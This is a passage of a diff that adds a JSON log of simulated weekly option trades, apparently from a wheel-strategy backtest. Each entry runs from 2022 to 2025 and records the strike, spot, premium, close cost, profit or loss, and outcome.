"premium": 0.9261427471537029, + "close_cost": 0.18454693457117832, + "pnl": 68.17958125825245, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-01-25 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 27.6, + "spot": 25.430309295654297, + "premium": 0.893434819882291, + "close_cost": 0.08866940692925773, + "pnl": 74.49654129530332, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-02-01 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 25.94, + "spot": 30.091341018676758, + "premium": 0.7967864886910938, + "close_cost": 4.1513410186767565, + "pnl": -338.4454529985663, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-02-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.29, + "spot": 28.329124450683594, + "premium": 0.8336814571346487, + "close_cost": 0.0, + "pnl": 77.38814571346487, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-02-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.63, + "spot": 30.086565017700195, + "premium": 0.893401381972323, + "close_cost": 0.4022492424870343, + "pnl": 43.13521394852887, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-02-22 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 25.72, + "spot": 23.343353271484375, + "premium": 0.9722942186834178, + "close_cost": 2.376646728515624, + "pnl": -143.42525098322062, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-03-01 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.81, + "spot": 23.89733123779297, + "premium": 1.269062808992702, + "close_cost": 0.08733123779297003, + "pnl": 112.19315711997321, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-03-07 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 24.38, + "spot": 20.40155601501465, + "premium": 1.2428186519439368, + "close_cost": 0.0003322292447269781, + "pnl": 118.26864226992097, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-03-14 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 20.81, + "spot": 19.035720825195312, + "premium": 1.0565125375447728, + "close_cost": 0.0, + "pnl": 99.67125375447728, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-03-21 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 19.42, + "spot": 25.210630416870117, + "premium": 1.000414534063923, + "close_cost": 5.7906304168701155, + "pnl": -482.01158828061926, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-03-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.7, + "spot": 27.23072624206543, + "premium": 0.9956702458628204, + "close_cost": 0.19335556443779023, + "pnl": 74.25146814250301, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-04-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.72, + "spot": 29.394094467163086, + "premium": 1.036918725556239, + "close_cost": 0.0, + "pnl": 97.71187255562391, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-04-11 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 27.63, + "spot": 22.9995059967041, + "premium": 0.8649935498807846, + "close_cost": 4.630494003295897, + "pnl": -379.5400453415113, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-04-18 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.46, + "spot": 22.50761604309082, + "premium": 1.1031384007376275, + "close_cost": 0.0, + "pnl": 104.33384007376274, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-04-22 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 22.96, + "spot": 19.82370376586914, + "premium": 0.896936395443678, + "close_cost": 0.02570452828221481, + "pnl": 81.14318671614632, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-04-26 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 20.22, + "spot": 18.247743606567383, + "premium": 0.8189197132252453, + "close_cost": 0.10424970311753423, + "pnl": 65.4870010107711, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-05-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 18.61, + "spot": 18.3098201751709, + "premium": 0.8275336090790661, + "close_cost": 0.0, + "pnl": 76.7733609079066, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-05-09 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 18.68, + "spot": 14.575267791748047, + "premium": 1.0004685595802032, + "close_cost": 0.00010121463557827542, + "pnl": 94.05673449446249, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-05-16 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.87, + "spot": 14.637351036071777, + "premium": 0.9919096290061811, + "close_cost": 0.0, + "pnl": 93.2109629006181, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-05-20 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.93, + "spot": 13.056612014770508, + "premium": 1.0614758378791898, + "close_cost": 0.17573574759993393, + "pnl": 82.59400902792558, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-05-27 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 13.32, + "spot": 15.898122787475586, + "premium": 0.9972668734025838, + "close_cost": 2.5781227874755857, + "pnl": -161.07559140730018, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-06-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.94, + "spot": 16.667001724243164, + "premium": 0.8256464335363809, + "close_cost": 0.038433061244090405, + "pnl": 72.74133722922905, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-06-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.43, + "spot": 15.917226791381836, + "premium": 0.6981331327514431, + "close_cost": 0.17784812541765493, + "pnl": 46.048500733378816, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-06-17 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 12.03, + "spot": 10.82638931274414, + "premium": 0.5613351539897851, + "close_cost": 1.2036106872558587, + "pnl": -67.21755332660736, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-06-24 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 11.04, + "spot": 13.362255096435547, + "premium": 0.6866299319885423, + "close_cost": 2.3222550964355477, + "pnl": -166.55251644470056, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-01 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 12.56, + "spot": 11.647796630859375, + "premium": 0.6321767084017909, + "close_cost": 0.9122033691406255, + "pnl": -30.992666073883463, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-08 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 11.88, + "spot": 13.319273948669434, + "premium": 0.7084813736748083, + "close_cost": 1.4392739486694328, + "pnl": -76.06925749946244, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 12.52, + "spot": 12.793953895568848, + "premium": 0.5669064522733693, + "close_cost": 0.0, + "pnl": 50.710645227336926, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-07-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 12.03, + "spot": 13.591484069824219, + "premium": 0.3797955612836157, + "close_cost": 0.03423865647240776, + "pnl": 28.57569048112079, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-07-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 13.26, + "spot": 14.68033218383789, + "premium": 0.35997514608792525, + "close_cost": 0.027886002362743523, + "pnl": 27.228914372518172, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-08-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.98, + "spot": 17.020397186279297, + "premium": 0.38891032797860525, + "close_cost": 0.014972289027593622, + "pnl": 31.413803895101164, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-08-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 15.68, + "spot": 17.43110466003418, + "premium": 0.38622032012647534, + "close_cost": 0.15431473252735106, + "pnl": 17.210558759912427, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2022-08-24 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 16.74, + "spot": 15.621132850646973, + "premium": 0.41641418925739515, + "close_cost": 1.1188671493530258, + "pnl": -73.23529600956306, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-08-29 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 15.93, + "spot": 13.997417449951172, + "premium": 0.5312362333008585, + "close_cost": 0.011324480289972905, + "pnl": 46.01117530108856, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-09-02 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.28, + "spot": 12.741421699523926, + "premium": 0.5889786745803143, + "close_cost": 0.03251572918100465, + "pnl": 49.66629453993096, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-09-09 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 13.0, + "spot": 14.250523567199707, + "premium": 0.4882294298608265, + "close_cost": 1.250523567199707, + "pnl": -79.21941373388805, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-09-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 13.4, + "spot": 14.77107048034668, + "premium": 0.3228258140817637, + "close_cost": 0.0862013550195293, + "pnl": 17.68244590622344, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-09-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.04, + "spot": 12.029850006103516, + "premium": 0.36948082684024586, + "close_cost": 0.16012270429058306, + "pnl": 14.955812254966279, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-09-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.57, + "spot": 10.047958374023438, + "premium": 0.29255376999880456, + "close_cost": 0.1363185095964159, + "pnl": 9.643526040238866, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-10-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 8.67, + "spot": 9.866480827331543, + "premium": 0.2654216715088462, + "close_cost": 0.060987915545782645, + "pnl": 14.463375596306356, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-10-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 8.75, + "spot": 9.221770286560059, + "premium": 0.3243656721423065, + "close_cost": 0.03489371125018903, + "pnl": 22.967196089211747, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-10-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 7.89, + "spot": 9.216994285583496, + "premium": 0.2476489070644292, + "close_cost": 0.04104158482258835, + "pnl": 14.680732224184087, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-10-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.23, + "spot": 10.157796859741211, + "premium": 0.33683290145217937, + "close_cost": 0.13348492641348964, + "pnl": 14.354797503868973, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-11-04 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 9.74, + "spot": 8.572283744812012, + "premium": 0.37872710184224445, + "close_cost": 1.1677162551879885, + "pnl": -81.8889153345744, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-11-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.74, + "spot": 10.82638931274414, + "premium": 0.45004184720638607, + "close_cost": 2.0863893127441404, + "pnl": -166.62474655377545, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-11-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 10.18, + "spot": 10.964879989624023, + "premium": 0.5100864949158237, + "close_cost": 0.2107242594098726, + "pnl": 23.95622355059511, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-11-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.8, + "spot": 10.539849281311035, + "premium": 0.46254148185622546, + "close_cost": 0.19892402950174892, + "pnl": 20.381745235447653, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-11-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.99, + "spot": 11.251420021057129, + "premium": 0.44017370030141745, + "close_cost": 0.056819395157653, + "pnl": 32.35543051437645, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-12-09 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 10.51, + "spot": 9.976323127746582, + "premium": 0.43019700302551955, + "close_cost": 0.5336768722534178, + "pnl": -13.33798692278982, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-12-15 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.18, + "spot": 9.379366874694824, + "premium": 0.3755968150581781, + "close_cost": 0.0073418145249278255, + "pnl": 30.84550005332503, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-12-19 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 9.57, + "spot": 8.725103378295898, + "premium": 0.37989744569377804, + "close_cost": 0.04984623342996186, + "pnl": 27.025121226381618, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-12-27 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 8.9, + "spot": 8.083927154541016, + "premium": 0.36263166865688934, + "close_cost": 0.0, + "pnl": 30.28316686568893, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2023-01-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 8.25, + "spot": 8.117527961730957, + "premium": 0.3426811576150013, + "close_cost": 0.0, + "pnl": 28.288115761500126, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2023-01-10 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.28, + "spot": 8.875997543334961, + "premium": 0.28144760566467664, + "close_cost": 0.5959975433349616, + "pnl": -34.44499376702849, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-02-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.28, + "spot": 11.977076530456543, + "premium": 0.2855930292857214, + "close_cost": 0.08277245044297388, + "pnl": 14.302057884274749, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2023-02-22 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 11.76, + "spot": 10.738565444946289, + "premium": 0.2976775132496896, + "close_cost": 1.0214345550537107, + "pnl": -75.3657041804021, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-02-28 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.95, + "spot": 10.6233549118042, + "premium": 0.4503060088079174, + "close_cost": 0.07536756948841417, + "pnl": 31.513843931950323, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2023-03-07 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.84, + "spot": 10.887377738952637, + "premium": 0.41932668463892586, + "close_cost": 0.04737773895263686, + "pnl": 31.214894568628896, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2023-03-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 11.11, + "spot": 10.023299217224121, + "premium": 0.3368562541645481, + "close_cost": 0.02441630812454465, + "pnl": 25.263994604000345, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-03-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 10.22, + "spot": 11.794659614562988, + "premium": 0.2897111478561083, + "close_cost": 1.5746596145629876, + "pnl": -131.48484667068794, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-11-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.76, + "spot": 16.755002975463867, + "premium": 0.2108527286052575, + "close_cost": 0.02472281966853762, + "pnl": 12.632990893671987, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2023-11-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 17.37, + "spot": 18.995811462402344, + "premium": 0.25301030834325644, + "close_cost": 0.1248286597021826, + "pnl": 6.838164864107384, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2023-11-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 18.46, + "spot": 20.872058868408203, + "premium": 0.29332641166304807, + "close_cost": 0.086085923822796, + "pnl": 14.744048784025207, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-01-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.09, + "spot": 23.80017852783203, + "premium": 0.12668403719410382, + "close_cost": 0.00034875753952182814, + "pnl": 6.653527965458199, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-01-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.52, + "spot": 24.429967880249023, + "premium": 0.15674723985441386, + "close_cost": 0.06725298412093039, + "pnl": 2.969425573348346, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-01-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.09, + "spot": 25.17204475402832, + "premium": 0.1355760901137426, + "close_cost": 0.040831294649649186, + "pnl": 3.494479546409341, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-02-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.16, + "spot": 26.607376098632812, + "premium": 0.1994721639157202, + "close_cost": 0.05356130209425469, + "pnl": 8.61108618214655, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-02-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.04, + "spot": 28.579742431640625, + "premium": 0.2521808140816173, + "close_cost": 0.09035587933184086, + "pnl": 10.202493474977643, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-02-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.74, + "spot": 29.375520706176758, + "premium": 0.2107039967984381, + "close_cost": 0.029593472149631483, + "pnl": 12.13105246488066, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-02-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.49, + "spot": 29.468280792236328, + "premium": 0.32886981028218454, + "close_cost": 0.13676269846407152, + "pnl": 13.230711181811301, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-03-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.09, + "spot": 30.66439437866211, + "premium": 0.29630626202737353, + "close_cost": 0.03435957927782707, + "pnl": 20.214668274954647, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-03-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.4, + "spot": 28.99471664428711, + "premium": 0.3859896580583806, + "close_cost": 0.15473330074784375, + "pnl": 17.145635731053684, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-03-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.44, + "spot": 30.231170654296875, + "premium": 0.3386077222298489, + "close_cost": 0.1329593732122034, + "pnl": 14.584834901764548, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-04-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.28, + "spot": 30.348764419555664, + "premium": 0.24281312727783533, + "close_cost": 0.0006781849438790427, + "pnl": 18.23349423339563, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-04-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.76, + "spot": 29.731401443481445, + "premium": 0.19864154775277854, + "close_cost": 0.09195703460171467, + "pnl": 4.688451315106386, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-04-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.87, + "spot": 30.231170654296875, + "premium": 0.13149751062859671, + "close_cost": 0.03716459192245303, + "pnl": 3.4532918706143683, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-04-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.69, + "spot": 26.0615234375, + "premium": 0.17534969302338066, + "close_cost": 0.0, + "pnl": 11.554969302338066, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2024-04-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.5, + "spot": 27.085561752319336, + "premium": 0.2620815774905978, + "close_cost": 0.046312683561162915, + "pnl": 15.596889392943488, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-05-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.29, + "spot": 26.218313217163086, + "premium": 0.33708860985265066, + "close_cost": 0.16558482452028844, + "pnl": 11.17037853323622, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-05-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.97, + "spot": 28.991546630859375, + "premium": 0.43051768545168656, + "close_cost": 0.13227873818920255, + "pnl": 23.8438947262484, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-05-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.94, + "spot": 31.098417282104492, + "premium": 0.3161727770293501, + "close_cost": 0.08201134378483976, + "pnl": 17.436143324451034, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-06-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.83, + "spot": 30.936729431152344, + "premium": 0.11801706619946284, + "close_cost": 0.0027624263315714215, + "pnl": 5.545463986789141, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-06-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.11, + "spot": 36.394996643066406, + "premium": 0.16535909850218822, + "close_cost": 0.03912769007169259, + "pnl": 6.6431408430495615, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-07-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.69, + "spot": 39.66231918334961, + "premium": 0.24589516597430272, + "close_cost": 0.10430664028543424, + "pnl": 8.178852568886848, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-07-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.77, + "spot": 36.47517013549805, + "premium": 0.3572460584490651, + "close_cost": 0.07405530022815743, + "pnl": 22.339075822090766, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-07-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.25, + "spot": 32.19613265991211, + "premium": 0.5102522051595786, + "close_cost": 0.07444322221959832, + "pnl": 37.60089829399803, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-08 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 29.29, + "spot": 28.556476593017578, + "premium": 0.7010710563537703, + "close_cost": 0.733523406982421, + "pnl": -6.235235062865071, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-08-15 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 29.13, + "spot": 33.67164993286133, + "premium": 1.3443930046920478, + "close_cost": 4.541649932861329, + "pnl": -322.71569281692814, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-08-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.65, + "spot": 35.06849670410156, + "premium": 1.0726123104441267, + "close_cost": 0.23177286868773184, + "pnl": 78.10394417563948, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.61, + "spot": 33.67164993286133, + "premium": 0.9025336974270779, + "close_cost": 0.400302948995118, + "pnl": 44.243074843195984, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 30.68, + "spot": 33.74542999267578, + "premium": 0.7006672843855561, + "close_cost": 0.30126688233047005, + "pnl": 33.960040205508605, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-09-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.67, + "spot": 29.85494613647461, + "premium": 0.5583198752384799, + "close_cost": 0.2513649605347785, + "pnl": 24.71549147037014, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2024-09-16 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 30.74, + "spot": 32.683048248291016, + "premium": 0.6174759014341742, + "close_cost": 0.20180667496936877, + "pnl": 35.586922646480545, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-09-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.63, + "spot": 34.74879455566406, + "premium": 0.6367598634557616, + "close_cost": 0.21373878510847355, + "pnl": 36.32210783472881, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-09-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.95, + "spot": 35.76860809326172, + "premium": 0.5650580048819869, + "close_cost": 0.26688506777102106, + "pnl": 23.83729371109658, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-10-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.24, + "spot": 35.51203155517578, + "premium": 0.3887748106878073, + "close_cost": 0.06320450408128542, + "pnl": 26.577030660652188, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-10-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 34.37, + "spot": 37.59922409057617, + "premium": 0.22206190396108205, + "close_cost": 0.011170960102887095, + "pnl": 15.109094385819496, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-10-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.3, + "spot": 36.2669677734375, + "premium": 0.1918650628547267, + "close_cost": 0.06901310935795602, + "pnl": 6.305195349677069, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-11-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.21, + "spot": 34.998863220214844, + "premium": 0.2972686345417941, + "close_cost": 0.12918805776409403, + "pnl": 10.828057677770005, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-11-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.13, + "spot": 38.092655181884766, + "premium": 0.4302094289490803, + "close_cost": 0.17248390795162116, + "pnl": 19.792552099745915, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-11-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.16, + "spot": 38.78839111328125, + "premium": 0.49314997677113404, + "close_cost": 0.12697034844115418, + "pnl": 30.63796283299799, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-12-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.05, + "spot": 40.697959899902344, + "premium": 0.34984927994389636, + "close_cost": 0.054400926701978936, + "pnl": 23.564835324191744, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-12-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.59, + "spot": 44.11247634887695, + "premium": 0.30722114383946053, + "close_cost": 0.12628510348151956, + "pnl": 12.113604035794097, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-12-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.54, + "spot": 40.96934509277344, + "premium": 0.4778569661937251, + "close_cost": 0.2346513259977856, + "pnl": 18.34056401959395, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-01-02 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 41.07, + "spot": 38.92718505859375, + "premium": 0.5758426116192794, + "close_cost": 2.1428149414062503, + "pnl": -159.6872329786971, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-01-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 39.71, + "spot": 38.03606414794922, + "premium": 1.1539371302987682, + "close_cost": 0.0, + "pnl": 109.41371302987682, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2025-01-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 38.8, + "spot": 41.15994644165039, + "premium": 1.2706649483175134, + "close_cost": 2.3599464416503935, + "pnl": -111.918149333288, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-01-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.69, + "spot": 41.8431396484375, + "premium": 0.7541457053564571, + "close_cost": 0.09637285856715083, + "pnl": 59.79728467893062, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-01-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.37, + "spot": 40.9520149230957, + "premium": 0.5349358221710698, + "close_cost": 0.0, + "pnl": 47.513582217106986, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-02-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.49, + "spot": 41.41242980957031, + "premium": 0.605071935133882, + "close_cost": 0.15354722245627883, + "pnl": 39.172471267760315, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-02-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.5, + "spot": 42.39761734008789, + "premium": 0.548974706494473, + "close_cost": 0.09381621521778172, + "pnl": 39.535849127669124, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-02-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.8, + "spot": 44.74918746948242, + "premium": 0.4665367631709252, + "close_cost": 0.09728710719455336, + "pnl": 30.944965597637182, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-02-28 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.96, + "spot": 37.090484619140625, + "premium": 0.4533985175766535, + "close_cost": 1.8695153808593759, + "pnl": -144.60168632827225, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-03-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 37.83, + "spot": 34.69435119628906, + "premium": 0.9698385639672313, + "close_cost": 0.1365974876561422, + "pnl": 77.34410763110891, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-03-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 35.39, + "spot": 29.610010147094727, + "premium": 